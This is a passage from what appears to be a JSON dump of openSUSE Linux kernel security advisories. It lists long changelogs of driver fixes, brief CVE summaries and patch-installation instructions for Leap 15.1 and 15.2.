bsc#1179142 bsc#1179810).\n - scsi: qla2xxx: Update version to 10.02.00.104-k (bsc#1172538 bsc#1179142\n bsc#1179810).\n - scsi: qla2xxx: Use constant when it is known (bsc#1172538 bsc#1179142\n bsc#1179810).\n - scsi: qla2xxx: remove incorrect sparse #ifdef (bsc#1172538 bsc#1179142\n bsc#1179810).\n - scsi: storvsc: Fix error return in storvsc_probe() (git-fixes).\n - scsi: target: tcm_qla2xxx: Remove BUG_ON(in_interrupt()) (bsc#1172538\n bsc#1179142 bsc#1179810).\n - serial: 8250_omap: Avoid FIFO corruption caused by MDR1 access\n (git-fixes).\n - serial: 8250_pci: Add Realtek 816a and 816b (git-fixes).\n - serial: amba-pl011: Make sure we initialize the port.lock spinlock\n (git-fixes).\n - serial: ar933x_uart: set UART_CS_{RX,TX}_READY_ORIDE (git-fixes).\n - serial: txx9: add missing platform_driver_unregister() on error in\n serial_txx9_init (git-fixes).\n - serial_core: Check for port state when tty is in error state (git-fixes).\n - soc/tegra: fuse: Fix index bug in get_process_id (git-fixes).\n - soc: imx: gpc: fix power up sequencing (git-fixes).\n - soc: mediatek: Check if power domains can be powered on at boot time\n (git-fixes).\n - soc: qcom: smp2p: Safely acquire spinlock without IRQs (git-fixes).\n - soc: ti: Fix reference imbalance in knav_dma_probe (git-fixes).\n - soc: ti: knav_qmss: fix reference leak in knav_queue_probe (git-fixes).\n - spi: Add call to spi_slave_abort() function when spidev driver is\n released (git-fixes).\n - spi: Fix memory leak on splited transfers (git-fixes).\n - spi: bcm63xx-hsspi: fix missing clk_disable_unprepare() on error in\n bcm63xx_hsspi_resume (git-fixes).\n - spi: davinci: Fix use-after-free on unbind (git-fixes).\n - spi: dw: Enable interrupts in accordance with DMA xfer mode (git-fixes).\n - spi: dw: Fix Rx-only DMA transfers (git-fixes).\n - spi: dw: Return any value retrieved from the dma_transfer callback\n (git-fixes).\n - spi: img-spfi: fix potential double release (git-fixes).\n - spi: img-spfi: fix reference leak in img_spfi_resume (git-fixes).\n - spi: pic32: Do not leak DMA channels in probe error path (git-fixes).\n - spi: pxa2xx: Add missed security checks (git-fixes).\n - spi: spi-cavium-thunderx: Add missing pci_release_regions() (git-fixes).\n - spi: spi-loopback-test: Fix out-of-bounds read (git-fixes).\n - spi: spi-mem: Fix passing zero to 'PTR_ERR' warning (git-fixes).\n - spi: spi-mem: fix reference leak in spi_mem_access_start (git-fixes).\n - spi: spi-ti-qspi: fix reference leak in ti_qspi_setup (git-fixes).\n - spi: spidev: fix a potential use-after-free in spidev_release()\n (git-fixes).\n - spi: st-ssc4: Fix unbalanced pm_runtime_disable() in probe error path\n (git-fixes).\n - spi: st-ssc4: add missed pm_runtime_disable (git-fixes).\n - spi: tegra114: fix reference leak in tegra spi ops (git-fixes).\n - spi: tegra20-sflash: fix reference leak in tegra_sflash_resume\n (git-fixes).\n - spi: tegra20-slink: add missed clk_unprepare (git-fixes).\n - spi: tegra20-slink: fix reference leak in slink ops of tegra20\n (git-fixes).\n - splice: only read in as much information as there is pipe buffer space\n (bsc#1179520).\n - staging: comedi: check validity of wMaxPacketSize of usb endpoints found\n (git-fixes).\n - staging: comedi: gsc_hpdi: check dma_alloc_coherent() return value\n (git-fixes).\n - staging: comedi: mf6x4: Fix AI end-of-conversion detection (git-fixes).\n - staging: olpc_dcon: Do not call platform_device_unregister() in\n dcon_probe() (git-fixes).\n - staging: olpc_dcon: add a missing dependency (git-fixes).\n - staging: rtl8188eu: Add device code for TP-Link TL-WN727N v5.21\n (git-fixes).\n - staging: rtl8188eu: Add device id for MERCUSYS MW150US v2 (git-fixes).\n - staging: rtl8188eu: fix possible null dereference (git-fixes).\n - staging: rtl8192u: fix multiple memory leaks on error path (git-fixes).\n - staging: vt6656: set usb_set_intfdata on driver fail (git-fixes).\n - staging: wlan-ng: fix out of bounds read in prism2sta_probe_usb()\n (git-fixes).\n - staging: wlan-ng: properly check endpoint types (git-fixes).\n - sunrpc: fixed rollback in rpc_gssd_dummy_populate() (git-fixes).\n - thunderbolt: Use 32-bit writes when writing ring producer/consumer\n (git-fixes).\n - timer: Fix wheel index calculation on last level (git fixes)\n - timer: Prevent base->clk from moving backward (git-fixes)\n - tty: Fix ->pgrp locking in tiocspgrp() (git-fixes).\n - tty: always relink the port (git-fixes).\n - tty: link tty and port before configuring it as console (git-fixes).\n - tty: synclink_gt: Adjust indentation in several functions (git-fixes).\n - tty: synclinkmp: Adjust indentation in several functions (git-fixes).\n - tty:serial:mvebu-uart:fix a wrong return (git-fixes).\n - uapi/if_ether.h: move __UAPI_DEF_ETHHDR libc define (git-fixes).\n - uapi/if_ether.h: prevent redefinition of struct ethhdr (git-fixes).\n - usb: chipidea: ci_hdrc_imx: Pass DISABLE_DEVICE_STREAMING flag to imx6ul\n (git-fixes).\n - usb: chipidea: ci_hdrc_imx: add missing put_device() call in\n usbmisc_get_init_data() (git-fixes).\n - usb: dwc2: Fix IN FIFO allocation (git-fixes).\n - usb: dwc3: remove the call trace of USBx_GFLADJ (git-fixes).\n - usb: dwc3: ulpi: Use VStsDone to detect PHY regs access completion\n (git-fixes).\n - usb: ehci-omap: Fix PM disable depth umbalance in ehci_hcd_omap_probe\n (git-fixes).\n - usb: fsl: Check memory resource before releasing it (git-fixes).\n - usb: gadget: composite: Fix possible double free memory bug (git-fixes).\n - usb: gadget: configfs: Fix missing spin_lock_init() (git-fixes).\n - usb: gadget: configfs: Preserve function ordering after bind failure\n (git-fixes).\n - usb: gadget: configfs: fix concurrent issue between composite APIs\n (git-fixes).\n - usb: gadget: f_fs: Use local copy of descriptors for userspace copy\n (git-fixes).\n - usb: gadget: f_uac2: reset wMaxPacketSize (git-fixes).\n - usb: gadget: ffs: ffs_aio_cancel(): Save/restore IRQ flags (git-fixes).\n - usb: gadget: fix wrong endpoint desc (git-fixes).\n - usb: gadget: goku_udc: fix potential crashes in probe (git-fixes).\n - usb: gadget: net2280: fix memory leak on probe error handling paths\n (git-fixes).\n - usb: gadget: select CONFIG_CRC32 (git-fixes).\n - usb: gadget: serial: fix Tx stall after buffer overflow (git-fixes).\n - usb: gadget: udc: fix possible sleep-in-atomic-context bugs in\n gr_probe() (git-fixes).\n - usb: gadget: udc: gr_udc: fix memleak on error handling path in\n gr_ep_init() (git-fixes).\n - usb: hso: Fix debug compile warning on sparc32 (git-fixes).\n - usb: musb: omap2430: Get rid of musb .set_vbus for omap2430 glue\n (git-fixes).\n - usb: oxu210hp-hcd: Fix memory leak in oxu_create (git-fixes).\n - usb: usbfs: Suppress problematic bind and unbind uevents (git-fixes).\n - usblp: poison URBs upon disconnect (git-fixes).\n - usbnet: ipheth: fix connectivity with iOS 14 (git-fixes).\n - video: fbdev: neofb: fix memory leak in neo_scan_monitor() (git-fixes).\n - vt: Reject zero-sized screen buffer size (git-fixes).\n - vt: do not hardcode the mem allocation upper bound (git-fixes).\n - wan: ds26522: select CONFIG_BITREVERSE (git-fixes).\n - watchdog: coh901327: add COMMON_CLK dependency (git-fixes).\n - watchdog: da9062: No need to ping manually before setting timeout\n (git-fixes).\n - watchdog: da9062: do not ping the hw during stop() (git-fixes).\n - watchdog: qcom: Avoid context switch in restart handler (git-fixes).\n - watchdog: sirfsoc: Add missing dependency on HAS_IOMEM (git-fixes).\n - wil6210: select CONFIG_CRC32 (git-fixes).\n - wimax: fix duplicate initializer warning (git-fixes).\n - wireless: Use linux/stddef.h instead of stddef.h (git-fixes).\n - wireless: Use offsetof instead of custom macro (git-fixes).\n - x86/apic: Fix integer overflow on 10 bit left shift of cpu_khz\n (bsc#1112178).\n - x86/i8259: Use printk_deferred() to prevent deadlock (bsc#1112178).\n - x86/insn-eval: Use new for_each_insn_prefix() macro to loop over\n prefixes bytes (bsc#1112178).\n - x86/mm/ident_map: Check for errors from ident_pud_init() (bsc#1112178).\n - x86/mm/mem_encrypt: Fix definition of PMD_FLAGS_DEC_WP (bsc#1112178).\n - x86/mm/numa: Remove uninitialized_var() usage (bsc#1112178).\n - x86/mm: Fix leak of pmd ptlock (bsc#1112178).\n - x86/mtrr: Correct the range check before performing MTRR type lookups\n (bsc#1112178).\n - x86/resctrl: Add necessary kernfs_put() calls to prevent refcount leak\n (bsc#1112178).\n - x86/resctrl: Do not move a task to the same resource group (bsc#1112178).\n - x86/resctrl: Fix incorrect local bandwidth when mba_sc is enabled\n (bsc#1112178).\n - x86/resctrl: Remove superfluous kernfs_get() calls to prevent refcount\n leak (bsc#1112178).\n - x86/resctrl: Remove unused struct mbm_state::chunks_bw (bsc#1112178).\n - x86/resctrl: Use an IPI instead of task_work_add() to update PQR_ASSOC\n MSR (bsc#1112178).\n - x86/speculation: Fix prctl() when spectre_v2_user={seccomp,prctl},ibpb\n (bsc#1112178).\n - x86/tracing: Introduce a static key for exception tracing (bsc#1179895).\n - x86/traps: Simplify pagefault tracing logic (bsc#1179895).\n - x86/uprobes: Do not use prefixes.nbytes when looping over prefixes.bytes\n (bsc#1112178).\n - xhci: Give USB2 ports time to enter U3 in bus suspend (git-fixes).\n - xprtrdma: fix incorrect header size calculations (git-fixes).\n\n\nSpecial Instructions and Notes:\n\n Please reboot the system after installing this update.\n\nPatch Instructions:\n\n To install this openSUSE Security Update use the SUSE recommended installation methods\n like YaST online_update or \"zypper patch\".\n\n Alternatively you can run the command listed for your product:\n\n - openSUSE Leap 15.1:\n\n zypper in -t patch openSUSE-2021-75=1", "modified": "2021-01-16T14:17:01", "published": "2021-01-16T14:17:01", "id": "OPENSUSE-SU-2021:0075-1", "href": "https://lists.opensuse.org/archives/list/security-announce@lists.opensuse.org/thread/H7EJISS2OPKUSJFJ2BG5ZWHA2Z6H3VQB/", "type": "suse", "title": "Security update for the Linux Kernel (important)", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-07-25T12:12:24", "bulletinFamily": "unix", "cvelist": ["CVE-2020-25211", "CVE-2020-29568", "CVE-2020-29569", "CVE-2021-0342", "CVE-2021-20177", "CVE-2021-3347", "CVE-2021-3348"], "description": "An update that solves 7 vulnerabilities and has 49 fixes is\n now available.\n\nDescription:\n\n The openSUSE Leap 15.2 kernel was updated to receive various security and\n bugfixes.\n\n\n The following security bugs were fixed:\n\n - CVE-2021-3347: A use-after-free was discovered in the PI futexes during\n fault handling, allowing local users to execute code in the kernel\n (bnc#1181349).\n - CVE-2021-3348: Fixed a use-after-free in nbd_add_socket that could be\n triggered by local attackers (with access to the nbd device) via an I/O\n request at a certain point during device setup (bnc#1181504).\n - CVE-2021-20177: Fixed a kernel panic related to iptables string matching\n rules. A privileged user could insert a rule which could lead to denial\n of service (bnc#1180765).\n - CVE-2021-0342: In tun_get_user of tun.c, there is possible memory\n corruption due to a use after free. This could lead to local escalation\n of privilege with System execution privileges required. (bnc#1180812)\n - CVE-2020-29569: Fixed a potential privilege escalation and information\n leaks related to the PV block backend, as used by Xen (bnc#1179509).\n - CVE-2020-29568: Fixed a denial of service issue, related to processing\n watch events (bnc#1179508).\n - CVE-2020-25211: Fixed a flaw where a local attacker was able to inject\n conntrack netlink configuration that could cause a denial of service or\n trigger the use of incorrect protocol numbers in\n ctnetlink_parse_tuple_filter (bnc#1176395).\n\n The following non-security bugs were fixed:\n\n - ACPI/IORT: Do not blindly trust DMA masks from firmware (git-fixes).\n - ACPI: scan: add stub acpi_create_platform_device() for !CONFIG_ACPI\n (git-fixes).\n - ACPI: scan: Harden acpi_device_add() against device ID overflows\n (git-fixes).\n - ACPI: scan: Make acpi_bus_get_device() clear return pointer on error\n (git-fixes).\n - ACPI: sysfs: Prefer \"compatible\" modalias (git-fixes).\n - ALSA: doc: Fix reference to mixart.rst (git-fixes).\n - ALSA: fireface: Fix integer overflow in transmit_midi_msg() (git-fixes).\n - ALSA: firewire-tascam: Fix integer overflow in midi_port_work()\n (git-fixes).\n - ALSA: hda: Add Cometlake-R PCI ID (git-fixes).\n - ALSA: hda/hdmi - enable runtime pm for CI AMD display audio (git-fixes).\n - ALSA: hda/realtek: Enable headset of ASUS B1400CEPE with ALC256\n (git-fixes).\n - ALSA: hda/realtek: fix right sounds and mute/micmute LEDs for HP\n machines (git-fixes).\n - ALSA: hda/realtek - Limit int mic boost on Acer Aspire E5-575T\n (git-fixes).\n - ALSA: hda/tegra: fix tegra-hda on tegra30 soc (git-fixes).\n - ALSA: hda/via: Add minimum mute flag (git-fixes).\n - ALSA: hda/via: Apply the workaround generically for Clevo machines\n (git-fixes).\n - ALSA: pcm: fix hw_rule deps kABI (bsc#1181014).\n - ALSA: pcm: One more dependency for hw constraints (bsc#1181014).\n - ALSA: seq: oss: Fix missing error check in snd_seq_oss_synth_make_info()\n (git-fixes).\n - ALSA: usb-audio: Always apply the hw constraints for implicit fb sync\n (bsc#1181014).\n - ALSA: usb-audio: Annotate the endpoint index in audioformat (git-fixes).\n - ALSA: usb-audio: Avoid implicit feedback on Pioneer devices\n (bsc#1181014).\n - ALSA: usb-audio: Avoid unnecessary interface re-setup (git-fixes).\n - ALSA: usb-audio: Choose audioformat of a counter-part substream\n (git-fixes).\n - ALSA: usb-audio: Fix hw constraints dependencies (bsc#1181014).\n - ALSA: usb-audio: Fix implicit feedback sync setup for Pioneer devices\n (git-fixes).\n - ALSA: usb-audio: Fix the missing endpoints creations for quirks\n (git-fixes).\n - ALSA: usb-audio: Fix UAC1 rate setup for secondary endpoints\n (bsc#1181014).\n - ALSA: usb-audio: Set sample rate for all sharing EPs on UAC1\n (bsc#1181014).\n - arch/x86/lib/usercopy_64.c: fix __copy_user_flushcache() cache writeback\n (bsc#1152489).\n - arm64: pgtable: Ensure dirty bit is preserved across pte_wrprotect()\n (bsc#1180130).\n - arm64: pgtable: Fix pte_accessible() (bsc#1180130).\n - ASoC: ak4458: correct reset polarity (git-fixes).\n - ASoC: dapm: remove widget from dirty list on free (git-fixes).\n - ASoC: Intel: fix error code cnl_set_dsp_D0() (git-fixes).\n - ASoC: meson: axg-tdm-interface: fix loopback (git-fixes).\n - Bluetooth: revert: hci_h5: close serdev device and free hu in h5_close\n (git-fixes).\n - bnxt_en: Fix AER recovery (jsc#SLE-8371 bsc#1153274).\n - bpf: Do not leak memory in bpf getsockopt when optlen == 0 (bsc#1155518).\n - bpf: Fix helper bpf_map_peek_elem_proto pointing to wrong callback\n (bsc#1155518).\n - btrfs: send: fix invalid clone operations when cloning from the same\n file and root (bsc#1181511).\n - btrfs: send: fix wrong file path when there is an inode with a pending\n rmdir (bsc#1181237).\n - cachefiles: Drop superfluous readpages aops NULL check (git-fixes).\n - can: dev: prevent potential information leak in can_fill_info()\n (git-fixes).\n - can: vxcan: vxcan_xmit: fix use after free bug (git-fixes).\n - CDC-NCM: remove \"connected\" log message (git-fixes).\n - clk: tegra30: Add hda clock default rates to clock driver (git-fixes).\n - crypto: asym_tpm: correct zero out potential secrets (git-fixes).\n - drivers/base/memory.c: indicate all memory blocks as removable\n (bsc#1180264).\n - drivers/perf: Fix kernel panic when rmmod PMU modules during perf\n sampling (bsc#1180848).\n - drivers/perf: hisi: Permit modular builds of HiSilicon uncore drivers\n (bsc#1180848). - Update config files. - supported.conf:\n - drm: Added orientation quirk for ASUS tablet model T103HAF (git-fixes).\n - drm/amd/display: Add missing pflip irq for dcn2.0 (git-fixes).\n - drm/amd/display: Avoid MST manager resource leak (git-fixes).\n - drm/amd/display: dal_ddc_i2c_payloads_create can fail causing panic\n (git-fixes).\n - drm/amd/display: dchubbub p-state warning during surface planes switch\n (git-fixes).\n - drm/amd/display: Do not double-buffer DTO adjustments (git-fixes).\n - drm/amd/display: Do not invoke kgdb_breakpoint() unconditionally\n (git-fixes).\n - drm/amd/display: Fix memleak in amdgpu_dm_mode_config_init (git-fixes).\n - drm/amd/display: Free gamma after calculating legacy transfer function\n (git-fixes).\n - drm/amd/display: HDMI remote sink need mode validation for Linux\n (git-fixes).\n - drm/amd/display: Increase timeout for DP Disable (git-fixes).\n - drm/amd/display: Reject overlay plane configurations in multi-display\n scenarios (git-fixes).\n - drm/amd/display: remove useless if/else (git-fixes).\n - drm/amd/display: Retry AUX write when fail occurs (git-fixes).\n - drm/amd/display: Stop if retimer is not available (git-fixes).\n - drm/amd/display: update nv1x stutter latencies (git-fixes).\n - drm/amdgpu: add DID for navi10 blockchain SKU (git-fixes).\n - drm/amdgpu: correct the gpu reset handling for job != NULL case\n (git-fixes).\n - drm/amdgpu/dc: Require primary plane to be enabled whenever the CRTC is\n (git-fixes).\n - drm/amdgpu: do not map BO in reserved region (git-fixes).\n - drm/amdgpu: fix a GPU hang issue when remove device (git-fixes).\n - drm/amdgpu: Fix bug in reporting voltage for CIK (git-fixes).\n - drm/amdgpu: Fix bug where DPM is not enabled after hibernate and resume\n (git-fixes).\n - drm/amdgpu: fix build_coefficients() argument (git-fixes).\n - drm/amdgpu: fix calltrace during kmd unload(v3) (git-fixes).\n - drm/amdgpu: increase atombios cmd timeout (git-fixes).\n - drm/amdgpu: increase the reserved VM size to 2MB (git-fixes).\n - drm/amdgpu: perform srbm soft reset always on SDMA resume (git-fixes).\n - drm/amdgpu/powerplay: fix AVFS handling with custom powerplay table\n (git-fixes).\n - drm/amdgpu/powerplay/smu7: fix AVFS handling with custom powerplay table\n (git-fixes).\n - drm/amdgpu: prevent double kfree ttm->sg (git-fixes).\n - drm/amdgpu/psp: fix psp gfx ctrl cmds (git-fixes).\n - drm/amdgpu/sriov add amdgpu_amdkfd_pre_reset in gpu reset (git-fixes).\n - drm/amdkfd: fix a memory leak issue (git-fixes).\n - drm/amdkfd: Fix leak in dmabuf import (git-fixes).\n - drm/amdkfd: fix restore worker race condition (git-fixes).\n - drm/amdkfd: Use same SQ prefetch setting as amdgpu (git-fixes).\n - drm/amd/pm: avoid false alarm due to confusing softwareshutdowntemp\n setting (git-fixes).\n - drm/aspeed: Fix Kconfig warning & subsequent build errors (bsc#1152472)\n - drm/aspeed: Fix Kconfig warning & subsequent build errors (git-fixes).\n - drm/atomic: put state on error path (git-fixes).\n - drm: bridge: dw-hdmi: Avoid resetting force in the detect function\n (bsc#1152472)\n - drm/bridge/synopsys: dsi: add support for non-continuous HS clock\n (git-fixes).\n - drm/brige/megachips: Add checking if ge_b850v3_lvds_init() is working\n correctly (git-fixes).\n - drm/dp_aux_dev: check aux_dev before use in (bsc#1152472)\n - drm/dp_aux_dev: check aux_dev before use in\n drm_dp_aux_dev_get_by_minor() (git-fixes).\n - drm/etnaviv: always start/stop scheduler in timeout processing\n (git-fixes).\n - drm/exynos: dsi: Remove bridge node reference in error handling path in\n probe function (git-fixes).\n - drm/gma500: fix double free of gma_connector (bsc#1152472) Backporting\n notes: \t* context changes\n - drm/gma500: fix double free of gma_connector (git-fixes).\n - drm/gma500: Fix out-of-bounds access to struct drm_device.vblank[]\n (git-fixes).\n - drm/i915: Avoid memory leak with more than 16 workarounds on a list\n (git-fixes).\n - drm/i915: Break up error capture compression loops with cond_resched()\n (git-fixes).\n - drm/i915: Check for all subplatform bits (git-fixes).\n - drm/i915: clear the gpu reloc batch (git-fixes).\n - drm/i915: Correctly set SFC capability for video engines (bsc#1152489)\n Backporting notes: \t* context changes\n - drm/i915/display/dp: Compute the correct slice count for VDSC on DP\n (git-fixes).\n - drm/i915: Drop runtime-pm assert from vgpu io accessors (git-fixes).\n - drm/i915/dsi: Use unconditional msleep for the panel_on_delay when there\n is no reset-deassert MIPI-sequence (git-fixes).\n - drm/i915: Filter wake_flags passed to default_wake_function (git-fixes).\n - drm/i915: Fix mismatch between misplaced vma check and vma insert\n (git-fixes).\n - drm/i915: Force VT'd workarounds when running as a guest OS (git-fixes).\n - drm/i915/gt: Declare gen9 has 64 mocs entries! (git-fixes).\n - drm/i915/gt: Delay execlist processing for tgl (git-fixes).\n - drm/i915/gt: Free stale request on destroying the virtual engine\n (git-fixes).\n - drm/i915/gt: Prevent use of engine->wa_ctx after error (git-fixes).\n - drm/i915/gt: Program mocs:63 for cache eviction on gen9 (git-fixes).\n - drm/i915/gvt: return error when failing to take the module reference\n (git-fixes).\n - drm/i915/gvt: Set ENHANCED_FRAME_CAP bit (git-fixes).\n - drm/i915: Handle max_bpc==16 (git-fixes).\n - drm/i915/selftests: Avoid passing a random 0 into ilog2 (git-fixes).\n - drm/mcde: Fix handling of platform_get_irq() error (bsc#1152472)\n - drm/mcde: Fix handling of platform_get_irq() error (git-fixes).\n - drm/meson: dw-hdmi: Register a callback to disable the regulator\n (git-fixes).\n - drm/msm/a5xx: Always set an OPP supported hardware value (git-fixes).\n - drm/msm/a6xx: fix a potential overflow issue (git-fixes).\n - drm/msm/a6xx: fix gmu start on newer firmware (git-fixes).\n - drm/msm: add shutdown support for display platform_driver (git-fixes).\n - drm/msm: Disable preemption on all 5xx targets (git-fixes).\n - drm/msm/dpu: Add newline to printks (git-fixes).\n - drm/msm/dpu: Fix scale params in plane validation (git-fixes).\n - drm/msm/dsi_phy_10nm: implement PHY disabling (git-fixes).\n - drm/msm/dsi_pll_10nm: restore VCO rate during restore_state (git-fixes).\n - drm/msm: fix leaks if initialization fails (git-fixes).\n - drm/nouveau/bios: fix issue shadowing expansion ROMs (git-fixes).\n - drm/nouveau/debugfs: fix runtime pm imbalance on error (git-fixes).\n - drm/nouveau/dispnv50: fix runtime pm imbalance on error (git-fixes).\n - drm/nouveau: fix runtime pm imbalance on error (git-fixes).\n - drm/nouveau/i2c/gm200: increase width of aux semaphore owner fields\n (git-fixes).\n - drm/nouveau/kms/nv50-: fix case where notifier buffer is at offset 0\n (git-fixes).\n - drm/nouveau/mem: guard against NULL pointer access in mem_del\n (git-fixes).\n - drm/nouveau/mmu: fix vram heap sizing (git-fixes).\n - drm/nouveau/nouveau: fix the start/end range for migration (git-fixes).\n - drm/nouveau/privring: ack interrupts the same way as RM (git-fixes).\n - drm/nouveau/svm: fail NOUVEAU_SVM_INIT ioctl on unsupported devices\n (git-fixes).\n - drm/omap: dmm_tiler: fix return error code in omap_dmm_probe()\n (git-fixes).\n - drm/omap: dss: Cleanup DSS ports on initialisation failure (git-fixes).\n - drm/omap: fix incorrect lock state (git-fixes).\n - drm/omap: fix possible object reference leak (git-fixes).\n - drm/panfrost: add amlogic reset quirk callback (git-fixes).\n - drm: rcar-du: Set primary plane zpos immutably at initializing\n (git-fixes).\n - drm/rockchip: Avoid uninitialized use of endpoint id in LVDS\n (bsc#1152472)\n - drm/rockchip: Avoid uninitialized use of endpoint id in LVDS (git-fixes).\n - drm/scheduler: Avoid accessing freed bad job (git-fixes).\n - drm/sun4i: dw-hdmi: fix error return code in sun8i_dw_hdmi_bind()\n (bsc#1152472)\n - drm/sun4i: frontend: Fix the scaler phase on A33 (git-fixes).\n - drm/sun4i: frontend: Reuse the ch0 phase for RGB formats (git-fixes).\n - drm/sun4i: frontend: Rework a bit the phase data (git-fixes).\n - drm/sun4i: mixer: Extend regmap max_register (git-fixes).\n - drm/syncobj: Fix use-after-free (git-fixes).\n - drm/tegra: replace idr_init() by idr_init_base() (git-fixes).\n - drm/tegra: sor: Disable clocks on error in tegra_sor_init() (git-fixes).\n - drm/ttm: fix eviction valuable range check (git-fixes).\n - drm/tve200: Fix handling of platform_get_irq() error (bsc#1152472)\n - drm/tve200: Fix handling of platform_get_irq() error (git-fixes).\n - drm/tve200: Stabilize enable/disable (git-fixes).\n - drm/vc4: drv: Add error handding for bind (git-fixes).\n - e1000e: bump up timeout to wait when ME un-configures ULP mode\n (jsc#SLE-8100).\n - ehci: fix EHCI host controller initialization sequence (git-fixes).\n - ethernet: ucc_geth: fix use-after-free in ucc_geth_remove() (git-fixes).\n - Exclude Symbols.list again. Removing the exclude builds\n vanilla/linux-next builds. Fixes: 55877625c800 (\"kernel-binary.spec.in:\n Package the obj_install_dir as explicit filelist.\")\n - firmware: imx: select SOC_BUS to fix firmware build (git-fixes).\n - floppy: reintroduce O_NDELAY fix (boo#1181018).\n - futex: Ensure the correct return value from futex_lock_pi() (bsc#1181349\n bsc#1149032).\n - futex: Handle faults correctly for PI futexes (bsc#1181349 bsc#1149032).\n - futex: Provide and use pi_state_update_owner() (bsc#1181349 bsc#1149032).\n - futex: Remove needless goto's (bsc#1149032).\n - futex: Remove unused empty compat_exit_robust_list() (bsc#1149032).\n - futex: Replace pointless printk in fixup_owner() (bsc#1181349\n bsc#1149032).\n - futex: Simplify fixup_pi_state_owner() (bsc#1181349 bsc#1149032).\n - futex: Use pi_state_update_owner() in put_pi_state() (bsc#1181349\n bsc#1149032).\n - HID: Ignore battery for Elan touchscreen on ASUS UX550 (git-fixes).\n - HID: logitech-dj: add the G602 receiver (git-fixes).\n - HID: multitouch: Apply MT_QUIRK_CONFIDENCE quirk for multi-input devices\n (git-fixes).\n - HID: multitouch: do not filter mice nodes (git-fixes).\n - HID: multitouch: Enable multi-input for Synaptics pointstick/touchpad\n device (git-fixes).\n - HID: multitouch: Remove MT_CLS_WIN_8_DUAL (git-fixes).\n - HID: wacom: Constify attribute_groups (git-fixes).\n - HID: wacom: Correct NULL dereference on AES pen proximity (git-fixes).\n - HID: wacom: do not call hid_set_drvdata(hdev, NULL) (git-fixes).\n - HID: wacom: Fix memory leakage caused by kfifo_alloc (git-fixes).\n - hwmon: (pwm-fan) Ensure that calculation does not discard big period\n values (git-fixes).\n - i2c: bpmp-tegra: Ignore unknown I2C_M flags (git-fixes).\n - i2c: octeon: check correct size of maximum RECV_LEN packet (git-fixes).\n - ice: avoid premature Rx buffer reuse (jsc#SLE-7926).\n - ice, xsk: clear the status bits for the next_to_use descriptor\n (jsc#SLE-7926).\n - iio: ad5504: Fix setting power-down state (git-fixes).\n - iomap: fix WARN_ON_ONCE() from unprivileged users (bsc#1181494).\n - iommu/vt-d: Fix a bug for PDP check in prq_event_thread (bsc#1181217).\n - ionic: account for vlan tag len in rx buffer len (bsc#1167773).\n - kABI fixup for dwc3 introduction of DWC_usb32 (git-fixes).\n - kprobes: tracing/kprobes: Fix to kill kprobes on initmem after boot (git\n fixes (kernel/kprobe)).\n - KVM: nVMX: Reload vmcs01 if getting vmcs12's pages fails (bsc#1181218).\n - KVM: s390: pv: Mark mm as protected after the set secure parameters and\n improve cleanup (jsc#SLE-7512 bsc#1165545).\n - KVM: SVM: Initialize prev_ga_tag before use (bsc#1180809).\n - leds: trigger: fix potential deadlock with libata (git-fixes).\n - lib/genalloc: fix the overflow when size is too big (git-fixes).\n - lockd: do not use interval-based rebinding over TCP (for-next).\n - mac80211: check if atf has been disabled in __ieee80211_schedule_txq\n (git-fixes).\n - mac80211: do not drop tx nulldata packets on encrypted links (git-fixes).\n - md: fix a warning caused by a race between concurrent md_ioctl()s\n (for-next).\n - media: dvb-usb: Fix memory leak at error in dvb_usb_device_init()\n (bsc#1181104).\n - media: dvb-usb: Fix use-after-free access (bsc#1181104).\n - media: rc: ensure that uevent can be read directly after rc device\n register (git-fixes).\n - misdn: dsp: select CONFIG_BITREVERSE (git-fixes).\n - mmc: core: do not initialize block size from ext_csd if not present\n (git-fixes).\n - mmc: sdhci-xenon: fix 1.8v regulator stabilization (git-fixes).\n - mm: memcontrol: fix missing wakeup polling thread (bsc#1181584).\n - mm/vmalloc: Fix unlock order in s_stop() (git fixes (mm/vmalloc)).\n - module: delay kobject uevent until after module init call (bsc#1178631).\n - mt7601u: fix kernel crash unplugging the device (git-fixes).\n - mt7601u: fix rx buffer refcounting (git-fixes).\n - net/af_iucv: fix null pointer dereference on shutdown (bsc#1179567\n LTC#190111).\n - net/af_iucv: set correct sk_protocol for child sockets (git-fixes).\n - net: fix proc_fs init handling in af_packet and tls (bsc#1154353).\n - net: hns3: fix a phy loopback fail issue (bsc#1154353).\n - net: hns3: remove a misused pragma packed (bsc#1154353).\n - net/mlx5e: ethtool, Fix restriction of autoneg with 56G (jsc#SLE-8464).\n - net: mscc: ocelot: allow offloading of bridge on top of LAG (git-fixes).\n - net/smc: cancel event worker during device removal (git-fixes).\n - net/smc: check for valid ib_client_data (git-fixes).\n - net/smc: fix cleanup for linkgroup setup failures (git-fixes).\n - net/smc: fix direct access to ib_gid_addr->ndev in\n smc_ib_determine_gid() (git-fixes).\n - net/smc: fix dmb buffer shortage (git-fixes).\n - net/smc: fix sleep bug in smc_pnet_find_roce_resource() (git-fixes).\n - net/smc: fix sock refcounting in case of termination (git-fixes).\n - net/smc: fix valid DMBE buffer sizes (git-fixes).\n - net/smc: no peer ID in CLC decline for SMCD (git-fixes).\n - net/smc: remove freed buffer from list (git-fixes).\n - net/smc: reset sndbuf_desc if freed (git-fixes).\n - net/smc: set rx_off for SMCR explicitly (git-fixes).\n - net/smc: switch smcd_dev_list spinlock to mutex (git-fixes).\n - net/smc: transfer fasync_list in case of fallback (git-fixes).\n - net: sunrpc: Fix 'snprintf' return value check in 'do_xprt_debugfs'\n (for-next).\n - net: sunrpc: interpret the return value of kstrtou32 correctly\n (for-next).\n - net: usb: qmi_wwan: add Quectel EM160R-GL (git-fixes).\n - net: vlan: avoid leaks on register_vlan_dev() failures (bsc#1154353).\n - NFC: fix possible resource leak (git-fixes).\n - NFC: fix resource leak when target index is invalid (git-fixes).\n - NFS4: Fix use-after-free in trace_event_raw_event_nfs4_set_lock\n (for-next).\n - nfs_common: need lock during iterate through the list (for-next).\n - nfsd4: readdirplus shouldn't return parent of export (git-fixes).\n - nfsd: Fix message level for normal termination (for-next).\n - NFS: nfs_delegation_find_inode_server must first reference the\n superblock (for-next).\n - NFS: nfs_igrab_and_active must first reference the superblock (for-next).\n - NFS/pNFS: Fix a leak of the layout 'plh_outstanding' counter (for-next).\n - NFS/pNFS: Fix a typo in ff_layout_resend_pnfs_read() (for-next).\n - NFS: switch nfsiod to be an UNBOUND workqueue (for-next).\n - NFSv4.2: condition READDIR's mask for security label based on LSM state\n (for-next).\n - NFSv4: Fix 